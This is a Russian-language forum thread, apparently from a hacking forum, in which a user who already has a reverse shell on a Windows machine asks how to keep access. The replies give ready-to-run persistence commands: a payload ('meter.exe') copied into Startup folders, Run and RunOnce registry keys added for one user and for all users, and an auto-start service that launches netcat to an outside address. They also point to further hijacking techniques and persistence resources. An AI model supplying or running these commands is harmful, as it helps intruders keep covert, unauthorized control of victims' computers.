Подскажите актуальные методы закрепления в системе на винде после получения доступа по реверс шеллу к cmd
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Закрепление в системе Windows
- Автор темы sergeyalexeev1979
- Дата начала
Папка автозагрузки:
Службы:
Run / RUNonce (текущий пользователь):
Run / Runonce (любой пользователь):
Дополнительно гугли RID Hijacking, Utilman, Sticky Keys. Да и просто Windows Persistence (https://www.ired.team/offensive-security/persistence)
Код:
# Выполнять при входе конкретного пользователя
# В проводник
copy meter.exe %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
# Через реестр
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v persistence /t REG_SZ /d "C:\users\username\meter.exe"
# Выполнить при входе в систему любого пользователя
# Проводник
copy meter.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
# Реестр
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v persistence /t REG_SZ /d "C:\Windows\system32\meter.exe"Службы:
Код:
sc.exe create Tservice binPath= "nc.exe 10.10.10.10 123" start= auto
sc.exe start TserviceRun / RUNonce (текущий пользователь):
Код:
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"Run / Runonce (любой пользователь):
Код:
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"Дополнительно гугли RID Hijacking, Utilman, Sticky Keys. Да и просто Windows Persistence (https://www.ired.team/offensive-security/persistence)
hxxp://go.kaspersky.com/ru-ransomware-report.html раздел persistence
плюс здесь из исходников можешь взять https://github.com/last-byte/PersistenceSniper
плюс здесь из исходников можешь взять https://github.com/last-byte/PersistenceSniper
Последнее редактирование: